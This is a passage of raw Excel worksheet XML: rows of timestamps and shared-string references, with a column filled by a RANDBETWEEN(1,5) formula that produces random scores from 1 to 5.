      <c r="C14716" t="s">
        <v>73</v>
      </c>
      <c r="E14716" t="s">
        <v>13235</v>
      </c>
      <c r="F14716">
        <f t="shared" ca="1" si="229"/>
        <v>2</v>
      </c>
    </row>
    <row r="14717" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14717" s="1">
        <v>43235.934178240743</v>
      </c>
      <c r="C14717" t="s">
        <v>408</v>
      </c>
      <c r="E14717" t="s">
        <v>13236</v>
      </c>
      <c r="F14717">
        <f t="shared" ca="1" si="229"/>
        <v>2</v>
      </c>
    </row>
    <row r="14718" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A14718" s="1">
        <v>43235.887708333335</v>
      </c>
      <c r="C14718" t="s">
        <v>454</v>
      </c>
      <c r="D14718" t="s">
        <v>158</v>
      </c>
      <c r="E14718" s="2" t="s">
        <v>13237</v>
      </c>
      <c r="F14718">
        <f t="shared" ca="1" si="229"/>
        <v>1</v>
      </c>
    </row>
    <row r="14719" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A14719" s="1">
        <v>43235.887696759259</v>
      </c>
      <c r="C14719" t="s">
        <v>454</v>
      </c>
      <c r="D14719" t="s">
        <v>632</v>
      </c>
      <c r="E14719" s="2" t="s">
        <v>13238</v>
      </c>
      <c r="F14719">
        <f t="shared" ca="1" si="229"/>
        <v>3</v>
      </c>
    </row>
    <row r="14720" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A14720" s="1">
        <v>43235.887546296297</v>
      </c>
      <c r="C14720" t="s">
        <v>454</v>
      </c>
      <c r="D14720" t="s">
        <v>821</v>
      </c>
      <c r="E14720" s="2" t="s">
        <v>13239</v>
      </c>
      <c r="F14720">
        <f t="shared" ca="1" si="229"/>
        <v>3</v>
      </c>
    </row>
    <row r="14721" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A14721" s="1">
        <v>43235.887546296297</v>
      </c>
      <c r="C14721" t="s">
        <v>454</v>
      </c>
      <c r="D14721" t="s">
        <v>602</v>
      </c>
      <c r="E14721" s="2" t="s">
        <v>13240</v>
      </c>
      <c r="F14721">
        <f t="shared" ca="1" si="229"/>
        <v>3</v>
      </c>
    </row>
    <row r="14722" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14722" s="1">
        <v>43235.874849537038</v>
      </c>
      <c r="C14722" t="s">
        <v>6</v>
      </c>
      <c r="D14722" t="s">
        <v>25</v>
      </c>
      <c r="E14722" t="s">
        <v>13241</v>
      </c>
      <c r="F14722">
        <f t="shared" ref="F14722:F14785" ca="1" si="230">RANDBETWEEN(1,5)</f>
        <v>4</v>
      </c>
    </row>
    <row r="14723" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A14723" s="1">
        <v>43235.871817129628</v>
      </c>
      <c r="C14723" t="s">
        <v>542</v>
      </c>
      <c r="D14723" t="s">
        <v>151</v>
      </c>
      <c r="E14723" s="2" t="s">
        <v>13242</v>
      </c>
      <c r="F14723">
        <f t="shared" ca="1" si="230"/>
        <v>4</v>
      </c>
    </row>
    <row r="14724" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14724" s="1">
        <v>43235.865601851852</v>
      </c>
      <c r="C14724" t="s">
        <v>63</v>
      </c>
      <c r="D14724" t="s">
        <v>36</v>
      </c>
      <c r="E14724" t="s">
        <v>13243</v>
      </c>
      <c r="F14724">
        <f t="shared" ca="1" si="230"/>
        <v>2</v>
      </c>
    </row>
    <row r="14725" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A14725" s="1">
        <v>43235.86550925926</v>
      </c>
      <c r="C14725" t="s">
        <v>173</v>
      </c>
      <c r="D14725" t="s">
        <v>39</v>
      </c>
      <c r="E14725" s="2" t="s">
        <v>13244</v>
      </c>
      <c r="F14725">
        <f t="shared" ca="1" si="230"/>
        <v>4</v>
      </c>
    </row>
    <row r="14726" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14726" s="1">
        <v>43235.860983796294</v>
      </c>
      <c r="C14726" t="s">
        <v>2545</v>
      </c>
      <c r="D14726" t="s">
        <v>374</v>
      </c>
      <c r="E14726" t="s">
        <v>13041</v>
      </c>
      <c r="F14726">
        <f t="shared" ca="1" si="230"/>
        <v>1</v>
      </c>
    </row>
    <row r="14727" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14727" s="1">
        <v>43235.860312500001</v>
      </c>
      <c r="C14727" t="s">
        <v>6</v>
      </c>
      <c r="D14727" t="s">
        <v>25</v>
      </c>
      <c r="E14727" t="s">
        <v>13245</v>
      </c>
      <c r="F14727">
        <f t="shared" ca="1" si="230"/>
        <v>4</v>
      </c>
    </row>
    <row r="14728" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14728" s="1">
        <v>43235.848194444443</v>
      </c>
      <c r="C14728" t="s">
        <v>1414</v>
      </c>
      <c r="D14728" t="s">
        <v>36</v>
      </c>
      <c r="E14728" t="s">
        <v>13246</v>
      </c>
      <c r="F14728">
        <f t="shared" ca="1" si="230"/>
        <v>5</v>
      </c>
    </row>
    <row r="14729" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14729" s="1">
        <v>43235.848182870373</v>
      </c>
      <c r="C14729" t="s">
        <v>7580</v>
      </c>
      <c r="D14729" t="s">
        <v>36</v>
      </c>
      <c r="E14729" t="s">
        <v>13247</v>
      </c>
      <c r="F14729">
        <f t="shared" ca="1" si="230"/>
        <v>3</v>
      </c>
    </row>
    <row r="14730" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14730" s="1">
        <v>43235.821956018517</v>
      </c>
      <c r="C14730" t="s">
        <v>10</v>
      </c>
      <c r="D14730" t="s">
        <v>6</v>
      </c>
      <c r="E14730" t="s">
        <v>13248</v>
      </c>
      <c r="F14730">
        <f t="shared" ca="1" si="230"/>
        <v>2</v>
      </c>
    </row>
    <row r="14731" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14731" s="1">
        <v>43235.807789351849</v>
      </c>
      <c r="C14731" t="s">
        <v>10</v>
      </c>
      <c r="D14731" t="s">
        <v>11</v>
      </c>
      <c r="E14731" t="s">
        <v>13249</v>
      </c>
      <c r="F14731">
        <f t="shared" ca="1" si="230"/>
        <v>5</v>
      </c>
    </row>
    <row r="14732" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14732" s="1">
        <v>43235.804918981485</v>
      </c>
      <c r="C14732" t="s">
        <v>731</v>
      </c>
      <c r="D14732" t="s">
        <v>36</v>
      </c>
      <c r="E14732" t="s">
        <v>13250</v>
      </c>
      <c r="F14732">
        <f t="shared" ca="1" si="230"/>
        <v>1</v>
      </c>
    </row>
    <row r="14733" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A14733" s="1">
        <v>43235.742013888892</v>
      </c>
      <c r="C14733" t="s">
        <v>173</v>
      </c>
      <c r="D14733" t="s">
        <v>632</v>
      </c>
      <c r="E14733" s="2" t="s">
        <v>13251</v>
      </c>
      <c r="F14733">
        <f t="shared" ca="1" si="230"/>
        <v>5</v>
      </c>
    </row>
    <row r="14734" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A14734" s="1">
        <v>43235.737500000003</v>
      </c>
      <c r="C14734" t="s">
        <v>10</v>
      </c>
      <c r="D14734" t="s">
        <v>89</v>
      </c>
      <c r="E14734" s="2" t="s">
        <v>13252</v>
      </c>
      <c r="F14734">
        <f t="shared" ca="1" si="230"/>
        <v>1</v>
      </c>
    </row>
    <row r="14735" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14735" s="1">
        <v>43235.681504629632</v>
      </c>
      <c r="C14735" t="s">
        <v>10</v>
      </c>
      <c r="D14735" t="s">
        <v>89</v>
      </c>
      <c r="E14735" t="s">
        <v>13253</v>
      </c>
      <c r="F14735">
        <f t="shared" ca="1" si="230"/>
        <v>5</v>
      </c>
    </row>
    <row r="14736" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A14736" s="1">
        <v>43235.671226851853</v>
      </c>
      <c r="C14736" t="s">
        <v>10</v>
      </c>
      <c r="D14736" t="s">
        <v>17</v>
      </c>
      <c r="E14736" s="2" t="s">
        <v>13254</v>
      </c>
      <c r="F14736">
        <f t="shared" ca="1" si="230"/>
        <v>5</v>
      </c>
    </row>
    <row r="14737" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14737" s="1">
        <v>43235.667337962965</v>
      </c>
      <c r="C14737" t="s">
        <v>10</v>
      </c>
      <c r="D14737" t="s">
        <v>23</v>
      </c>
      <c r="E14737" t="s">
        <v>13255</v>
      </c>
      <c r="F14737">
        <f t="shared" ca="1" si="230"/>
        <v>4</v>
      </c>
    </row>
    <row r="14738" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14738" s="1">
        <v>43235.65247685185</v>
      </c>
      <c r="C14738" t="s">
        <v>10</v>
      </c>
      <c r="D14738" t="s">
        <v>46</v>
      </c>
      <c r="E14738" t="s">
        <v>13256</v>
      </c>
      <c r="F14738">
        <f t="shared" ca="1" si="230"/>
        <v>1</v>
      </c>
    </row>
    <row r="14739" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14739" s="1">
        <v>43235.645995370367</v>
      </c>
      <c r="C14739" t="s">
        <v>10</v>
      </c>
      <c r="D14739" t="s">
        <v>6</v>
      </c>
      <c r="E14739" t="s">
        <v>13257</v>
      </c>
      <c r="F14739">
        <f t="shared" ca="1" si="230"/>
        <v>4</v>
      </c>
    </row>
    <row r="14740" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A14740" s="1">
        <v>43235.639317129629</v>
      </c>
      <c r="C14740" t="s">
        <v>6</v>
      </c>
      <c r="D14740" t="s">
        <v>25</v>
      </c>
      <c r="E14740" s="2" t="s">
        <v>13258</v>
      </c>
      <c r="F14740">
        <f t="shared" ca="1" si="230"/>
        <v>4</v>
      </c>
    </row>
    <row r="14741" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A14741" s="1">
        <v>43235.638599537036</v>
      </c>
      <c r="C14741" t="s">
        <v>2452</v>
      </c>
      <c r="E14741" s="2" t="s">
        <v>13259</v>
      </c>
      <c r="F14741">
        <f t="shared" ca="1" si="230"/>
        <v>5</v>
      </c>
    </row>
    <row r="14742" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14742" s="1">
        <v>43235.630925925929</v>
      </c>
      <c r="C14742" t="s">
        <v>80</v>
      </c>
      <c r="D14742" t="s">
        <v>36</v>
      </c>
      <c r="E14742" t="s">
        <v>13260</v>
      </c>
      <c r="F14742">
        <f t="shared" ca="1" si="230"/>
        <v>4</v>
      </c>
    </row>
    <row r="14743" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A14743" s="1">
        <v>43235.630925925929</v>
      </c>
      <c r="C14743" t="s">
        <v>10</v>
      </c>
      <c r="D14743" t="s">
        <v>89</v>
      </c>
      <c r="E14743" s="2" t="s">
        <v>13261</v>
      </c>
      <c r="F14743">
        <f t="shared" ca="1" si="230"/>
        <v>5</v>
      </c>
    </row>
    <row r="14744" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A14744" s="1">
        <v>43235.614155092589</v>
      </c>
      <c r="C14744" t="s">
        <v>5162</v>
      </c>
      <c r="E14744" s="2" t="s">
        <v>13262</v>
      </c>
      <c r="F14744">
        <f t="shared" ca="1" si="230"/>
        <v>4</v>
      </c>
    </row>
    <row r="14745" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A14745" s="1">
        <v>43235.599652777775</v>
      </c>
      <c r="C14745" t="s">
        <v>2452</v>
      </c>
      <c r="D14745" t="s">
        <v>192</v>
      </c>
      <c r="E14745" s="2" t="s">
        <v>13263</v>
      </c>
      <c r="F14745">
        <f t="shared" ca="1" si="230"/>
        <v>3</v>
      </c>
    </row>
    <row r="14746" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14746" s="1">
        <v>43235.596666666665</v>
      </c>
      <c r="C14746" t="s">
        <v>5162</v>
      </c>
      <c r="D14746" t="s">
        <v>36</v>
      </c>
      <c r="E14746" t="s">
        <v>13264</v>
      </c>
      <c r="F14746">
        <f t="shared" ca="1" si="230"/>
        <v>5</v>
      </c>
    </row>
    <row r="14747" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A14747" s="1">
        <v>43235.592592592591</v>
      </c>
      <c r="C14747" t="s">
        <v>50</v>
      </c>
      <c r="E14747" s="2" t="s">
        <v>13265</v>
      </c>
      <c r="F14747">
        <f t="shared" ca="1" si="230"/>
        <v>1</v>
      </c>
    </row>
    <row r="14748" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14748" s="1">
        <v>43235.589236111111</v>
      </c>
      <c r="C14748" t="s">
        <v>144</v>
      </c>
      <c r="D14748" t="s">
        <v>36</v>
      </c>
      <c r="E14748" t="s">
        <v>13266</v>
      </c>
      <c r="F14748">
        <f t="shared" ca="1" si="230"/>
        <v>1</v>
      </c>
    </row>
    <row r="14749" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A14749" s="1">
        <v>43235.585335648146</v>
      </c>
      <c r="C14749" t="s">
        <v>10</v>
      </c>
      <c r="D14749" t="s">
        <v>20</v>
      </c>
      <c r="E14749" s="2" t="s">
        <v>13267</v>
      </c>
      <c r="F14749">
        <f t="shared" ca="1" si="230"/>
        <v>3</v>
      </c>
    </row>
    <row r="14750" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A14750" s="1">
        <v>43235.581724537034</v>
      </c>
      <c r="C14750" t="s">
        <v>10</v>
      </c>
      <c r="D14750" t="s">
        <v>6</v>
      </c>
      <c r="E14750" s="2" t="s">
        <v>13268</v>
      </c>
      <c r="F14750">
        <f t="shared" ca="1" si="230"/>
        <v>5</v>
      </c>
    </row>
    <row r="14751" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A14751" s="1">
        <v>43235.578159722223</v>
      </c>
      <c r="C14751" t="s">
        <v>6</v>
      </c>
      <c r="D14751" t="s">
        <v>25</v>
      </c>
      <c r="E14751" s="2" t="s">
        <v>13269</v>
      </c>
      <c r="F14751">
        <f t="shared" ca="1" si="230"/>
        <v>4</v>
      </c>
    </row>
    <row r="14752" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A14752" s="1">
        <v>43235.570983796293</v>
      </c>
      <c r="C14752" t="s">
        <v>260</v>
      </c>
      <c r="E14752" s="2" t="s">
        <v>13270</v>
      </c>
      <c r="F14752">
        <f t="shared" ca="1" si="230"/>
        <v>2</v>
      </c>
    </row>
    <row r="14753" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14753" s="1">
        <v>43235.566863425927</v>
      </c>
      <c r="C14753" t="s">
        <v>729</v>
      </c>
      <c r="D14753" t="s">
        <v>36</v>
      </c>
      <c r="E14753" t="s">
        <v>13271</v>
      </c>
      <c r="F14753">
        <f t="shared" ca="1" si="230"/>
        <v>4</v>
      </c>
    </row>
    <row r="14754" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A14754" s="1">
        <v>43235.531793981485</v>
      </c>
      <c r="C14754" t="s">
        <v>10</v>
      </c>
      <c r="D14754" t="s">
        <v>6</v>
      </c>
      <c r="E14754" s="2" t="s">
        <v>13272</v>
      </c>
      <c r="F14754">
        <f t="shared" ca="1" si="230"/>
        <v>5</v>
      </c>
    </row>
    <row r="14755" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14755" s="1">
        <v>43235.52853009259</v>
      </c>
      <c r="C14755" t="s">
        <v>10</v>
      </c>
      <c r="D14755" t="s">
        <v>92</v>
      </c>
      <c r="E14755" t="s">
        <v>13273</v>
      </c>
      <c r="F14755">
        <f t="shared" ca="1" si="230"/>
        <v>2</v>
      </c>
    </row>
    <row r="14756" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A14756" s="1">
        <v>43235.517951388887</v>
      </c>
      <c r="C14756" t="s">
        <v>10</v>
      </c>
      <c r="D14756" t="s">
        <v>52</v>
      </c>
      <c r="E14756" s="2" t="s">
        <v>13274</v>
      </c>
      <c r="F14756">
        <f t="shared" ca="1" si="230"/>
        <v>5</v>
      </c>
    </row>
    <row r="14757" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A14757" s="1">
        <v>43235.509479166663</v>
      </c>
      <c r="C14757" t="s">
        <v>82</v>
      </c>
      <c r="E14757" s="2" t="s">
        <v>13275</v>
      </c>
      <c r="F14757">
        <f t="shared" ca="1" si="230"/>
        <v>1</v>
      </c>
    </row>
    <row r="14758" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A14758" s="1">
        <v>43235.489942129629</v>
      </c>
      <c r="C14758" t="s">
        <v>173</v>
      </c>
      <c r="D14758" t="s">
        <v>192</v>
      </c>
      <c r="E14758" s="2" t="s">
        <v>13276</v>
      </c>
      <c r="F14758">
        <f t="shared" ca="1" si="230"/>
        <v>2</v>
      </c>
    </row>
    <row r="14759" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14759" s="1">
        <v>43235.474907407406</v>
      </c>
      <c r="C14759" t="s">
        <v>10</v>
      </c>
      <c r="D14759" t="s">
        <v>494</v>
      </c>
      <c r="E14759" t="s">
        <v>13277</v>
      </c>
      <c r="F14759">
        <f t="shared" ca="1" si="230"/>
        <v>3</v>
      </c>
    </row>
    <row r="14760" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A14760" s="1">
        <v>43235.460092592592</v>
      </c>
      <c r="C14760" t="s">
        <v>845</v>
      </c>
      <c r="D14760" t="s">
        <v>885</v>
      </c>
      <c r="E14760" s="2" t="s">
        <v>13278</v>
      </c>
      <c r="F14760">
        <f t="shared" ca="1" si="230"/>
        <v>1</v>
      </c>
    </row>
    <row r="14761" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A14761" s="1">
        <v>43235.430509259262</v>
      </c>
      <c r="C14761" t="s">
        <v>173</v>
      </c>
      <c r="D14761" t="s">
        <v>271</v>
      </c>
      <c r="E14761" s="2" t="s">
        <v>13279</v>
      </c>
      <c r="F14761">
        <f t="shared" ca="1" si="230"/>
        <v>3</v>
      </c>
    </row>
    <row r="14762" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A14762" s="1">
        <v>43235.422893518517</v>
      </c>
      <c r="C14762" t="s">
        <v>559</v>
      </c>
      <c r="E14762" s="2" t="s">
        <v>13280</v>
      </c>
      <c r="F14762">
        <f t="shared" ca="1" si="230"/>
        <v>5</v>
      </c>
    </row>
    <row r="14763" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A14763" s="1">
        <v>43235.412974537037</v>
      </c>
      <c r="C14763" t="s">
        <v>71</v>
      </c>
      <c r="E14763" s="2" t="s">
        <v>13281</v>
      </c>
      <c r="F14763">
        <f t="shared" ca="1" si="230"/>
        <v>3</v>
      </c>
    </row>
    <row r="14764" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14764" s="1">
        <v>43235.405590277776</v>
      </c>
      <c r="C14764" t="s">
        <v>2144</v>
      </c>
      <c r="D14764" t="s">
        <v>36</v>
      </c>
      <c r="E14764" t="s">
        <v>13282</v>
      </c>
      <c r="F14764">
        <f t="shared" ca="1" si="230"/>
        <v>2</v>
      </c>
    </row>
    <row r="14765" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A14765" s="1">
        <v>43235.393437500003</v>
      </c>
      <c r="C14765" t="s">
        <v>65</v>
      </c>
      <c r="E14765" s="2" t="s">
        <v>13283</v>
      </c>
      <c r="F14765">
        <f t="shared" ca="1" si="230"/>
        <v>2</v>
      </c>
    </row>
    <row r="14766" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14766" s="1">
        <v>43235.373067129629</v>
      </c>
      <c r="C14766" t="s">
        <v>6</v>
      </c>
      <c r="D14766" t="s">
        <v>25</v>
      </c>
      <c r="E14766" t="s">
        <v>13284</v>
      </c>
      <c r="F14766">
        <f t="shared" ca="1" si="230"/>
        <v>4</v>
      </c>
    </row>
    <row r="14767" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14767" s="1">
        <v>43235.369050925925</v>
      </c>
      <c r="C14767" t="s">
        <v>140</v>
      </c>
      <c r="D14767" t="s">
        <v>197</v>
      </c>
      <c r="E14767" t="s">
        <v>13285</v>
      </c>
      <c r="F14767">
        <f t="shared" ca="1" si="230"/>
        <v>4</v>
      </c>
    </row>
    <row r="14768" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14768" s="1">
        <v>43235.359699074077</v>
      </c>
      <c r="C14768" t="s">
        <v>7419</v>
      </c>
      <c r="D14768" t="s">
        <v>36</v>
      </c>
      <c r="E14768" t="s">
        <v>13286</v>
      </c>
      <c r="F14768">
        <f t="shared" ca="1" si="230"/>
        <v>5</v>
      </c>
    </row>
    <row r="14769" spans="1:6" ht="285" x14ac:dyDescent="0.25">
      <c r="A14769" s="1">
        <v>43235.354629629626</v>
      </c>
      <c r="C14769" t="s">
        <v>71</v>
      </c>
      <c r="E14769" s="2" t="s">
        <v>13287</v>
      </c>
      <c r="F14769">
        <f t="shared" ca="1" si="230"/>
        <v>4</v>
      </c>
    </row>
    <row r="14770" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14770" s="1">
        <v>43235.34412037037</v>
      </c>
      <c r="C14770" t="s">
        <v>4276</v>
      </c>
      <c r="D14770" t="s">
        <v>36</v>
      </c>
      <c r="E14770" t="s">
        <v>13288</v>
      </c>
      <c r="F14770">
        <f t="shared" ca="1" si="230"/>
        <v>1</v>
      </c>
    </row>
    <row r="14771" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14771" s="1">
        <v>43235.337372685186</v>
      </c>
      <c r="C14771" t="s">
        <v>166</v>
      </c>
      <c r="D14771" t="s">
        <v>36</v>
      </c>
      <c r="E14771" t="s">
        <v>13289</v>
      </c>
      <c r="F14771">
        <f t="shared" ca="1" si="230"/>
        <v>3</v>
      </c>
    </row>
    <row r="14772" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14772" s="1">
        <v>43235.32476851852</v>
      </c>
      <c r="C14772" t="s">
        <v>461</v>
      </c>
      <c r="E14772" t="s">
        <v>13290</v>
      </c>
      <c r="F14772">
        <f t="shared" ca="1" si="230"/>
        <v>4</v>
      </c>
    </row>
    <row r="14773" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A14773" s="1">
        <v>43235.276597222219</v>
      </c>
      <c r="C14773" t="s">
        <v>173</v>
      </c>
      <c r="D14773" t="s">
        <v>263</v>
      </c>
      <c r="E14773" s="2" t="s">
        <v>13291</v>
      </c>
      <c r="F14773">
        <f t="shared" ca="1" si="230"/>
        <v>4</v>
      </c>
    </row>
    <row r="14774" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14774" s="1">
        <v>43235.258344907408</v>
      </c>
      <c r="C14774" t="s">
        <v>16</v>
      </c>
      <c r="E14774" t="s">
        <v>13292</v>
      </c>
      <c r="F14774">
        <f t="shared" ca="1" si="230"/>
        <v>5</v>
      </c>
    </row>
    <row r="14775" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A14775" s="1">
        <v>43235.252314814818</v>
      </c>
      <c r="C14775" t="s">
        <v>65</v>
      </c>
      <c r="E14775" s="2" t="s">
        <v>13293</v>
      </c>
      <c r="F14775">
        <f t="shared" ca="1" si="230"/>
        <v>1</v>
      </c>
    </row>
    <row r="14776" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A14776" s="1">
        <v>43235.247731481482</v>
      </c>
      <c r="C14776" t="s">
        <v>41</v>
      </c>
      <c r="E14776" s="2" t="s">
        <v>13294</v>
      </c>
      <c r="F14776">
        <f t="shared" ca="1" si="230"/>
        <v>3</v>
      </c>
    </row>
    <row r="14777" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14777" s="1">
        <v>43235.235335648147</v>
      </c>
      <c r="C14777" t="s">
        <v>60</v>
      </c>
      <c r="E14777" t="s">
        <v>13295</v>
      </c>
      <c r="F14777">
        <f t="shared" ca="1" si="230"/>
        <v>1</v>
      </c>
    </row>
    <row r="14778" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A14778" s="1">
        <v>43235.22488425926</v>
      </c>
      <c r="C14778" t="s">
        <v>65</v>
      </c>
      <c r="E14778" s="2" t="s">
        <v>13296</v>
      </c>
      <c r="F14778">
        <f t="shared" ca="1" si="230"/>
        <v>3</v>
      </c>
    </row>
    <row r="14779" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14779" s="1">
        <v>43235.210057870368</v>
      </c>
      <c r="C14779" t="s">
        <v>118</v>
      </c>
      <c r="E14779" t="s">
        <v>13297</v>
      </c>
      <c r="F14779">
        <f t="shared" ca="1" si="230"/>
        <v>4</v>
      </c>
    </row>
    <row r="14780" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14780" s="1">
        <v>43235.188530092593</v>
      </c>
      <c r="C14780" t="s">
        <v>39</v>
      </c>
      <c r="D14780" t="s">
        <v>36</v>
      </c>
      <c r="E14780" t="s">
        <v>13298</v>
      </c>
      <c r="F14780">
        <f t="shared" ca="1" si="230"/>
        <v>5</v>
      </c>
    </row>
    <row r="14781" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A14781" s="1">
        <v>43235.151145833333</v>
      </c>
      <c r="C14781" t="s">
        <v>41</v>
      </c>
      <c r="E14781" s="2" t="s">
        <v>13299</v>
      </c>
      <c r="F14781">
        <f t="shared" ca="1" si="230"/>
        <v>2</v>
      </c>
    </row>
    <row r="14782" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14782" s="1">
        <v>43235.13009259259</v>
      </c>
      <c r="C14782" t="s">
        <v>41</v>
      </c>
      <c r="E14782" t="s">
        <v>13300</v>
      </c>
      <c r="F14782">
        <f t="shared" ca="1" si="230"/>
        <v>1</v>
      </c>
    </row>
    <row r="14783" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14783" s="1">
        <v>43235.122002314813</v>
      </c>
      <c r="C14783" t="s">
        <v>9712</v>
      </c>
      <c r="D14783" t="s">
        <v>36</v>
      </c>
      <c r="E14783" t="s">
        <v>13301</v>
      </c>
      <c r="F14783">
        <f t="shared" ca="1" si="230"/>
        <v>5</v>
      </c>
    </row>
    <row r="14784" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14784" s="1">
        <v>43235.110127314816</v>
      </c>
      <c r="C14784" t="s">
        <v>410</v>
      </c>
      <c r="D14784" t="s">
        <v>36</v>
      </c>
      <c r="E14784" t="s">
        <v>13302</v>
      </c>
      <c r="F14784">
        <f t="shared" ca="1" si="230"/>
        <v>1</v>
      </c>
    </row>
    <row r="14785" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14785" s="1">
        <v>43235.101921296293</v>
      </c>
      <c r="C14785" t="s">
        <v>73</v>
      </c>
      <c r="D14785" t="s">
        <v>36</v>
      </c>
      <c r="E14785" t="s">
        <v>13303</v>
      </c>
      <c r="F14785">
        <f t="shared" ca="1" si="230"/>
        <v>2</v>
      </c>
    </row>
    <row r="14786" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A14786" s="1">
        <v>43235.058368055557</v>
      </c>
      <c r="C14786" t="s">
        <v>10</v>
      </c>
      <c r="D14786" t="s">
        <v>20</v>
      </c>
      <c r="E14786" s="2" t="s">
        <v>13304</v>
      </c>
      <c r="F14786">
        <f t="shared" ref="F14786:F14849" ca="1" si="231">RANDBETWEEN(1,5)</f>
        <v>1</v>
      </c>
    </row>
    <row r="14787" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A14787" s="1">
        <v>43235.039143518516</v>
      </c>
      <c r="C14787" t="s">
        <v>140</v>
      </c>
      <c r="D14787" t="s">
        <v>234</v>
      </c>
      <c r="E14787" s="2" t="s">
        <v>13305</v>
      </c>
      <c r="F14787">
        <f t="shared" ca="1" si="231"/>
        <v>5</v>
      </c>
    </row>
    <row r="14788" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14788" s="1">
        <v>43235.000590277778</v>
      </c>
      <c r="C14788" t="s">
        <v>2545</v>
      </c>
      <c r="D14788" t="s">
        <v>2214</v>
      </c>
      <c r="E14788" t="s">
        <v>13041</v>
      </c>
      <c r="F14788">
        <f t="shared" ca="1" si="231"/>
        <v>3</v>
      </c>
    </row>
    <row r="14789" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A14789" s="1">
        <v>43234.990428240744</v>
      </c>
      <c r="C14789" t="s">
        <v>73</v>
      </c>
      <c r="E14789" s="2" t="s">
        <v>13306</v>
      </c>
      <c r="F14789">
        <f t="shared" ca="1" si="231"/>
        <v>5</v>
      </c>
    </row>
    <row r="14790" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14790" s="1">
        <v>43234.959583333337</v>
      </c>
      <c r="C14790" t="s">
        <v>13307</v>
      </c>
      <c r="D14790" t="s">
        <v>36</v>
      </c>
      <c r="E14790" t="s">
        <v>13308</v>
      </c>
      <c r="F14790">
        <f t="shared" ca="1" si="231"/>
        <v>3</v>
      </c>
    </row>
    <row r="14791" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14791" s="1">
        <v>43234.953206018516</v>
      </c>
      <c r="C14791" t="s">
        <v>2545</v>
      </c>
      <c r="D14791" t="s">
        <v>222</v>
      </c>
      <c r="E14791" t="s">
        <v>13041</v>
      </c>
      <c r="F14791">
        <f t="shared" ca="1" si="231"/>
        <v>3</v>
      </c>
    </row>
    <row r="14792" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14792" s="1">
        <v>43234.914050925923</v>
      </c>
      <c r="C14792" t="s">
        <v>2545</v>
      </c>
      <c r="D14792" t="s">
        <v>244</v>
      </c>
